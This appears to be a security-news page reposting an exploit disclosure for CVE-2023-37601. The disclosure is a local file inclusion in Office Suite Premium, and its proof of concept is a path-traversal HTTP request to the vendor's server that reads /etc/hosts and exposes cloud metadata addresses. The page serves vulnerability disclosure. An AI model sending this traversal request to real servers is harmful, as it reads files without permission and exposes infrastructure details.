Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-37601: Office Suite Premium 10.9.1.42602 Local File Inclusion ≈ Packet Storm

Office Suite Premium v10.9.1.42602 was discovered to contain a local file inclusion (LFI) vulnerability via the component /etc/hosts.

CVE
#vulnerability#ios#mac#apple#google#ubuntu#pdf#auth
# Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907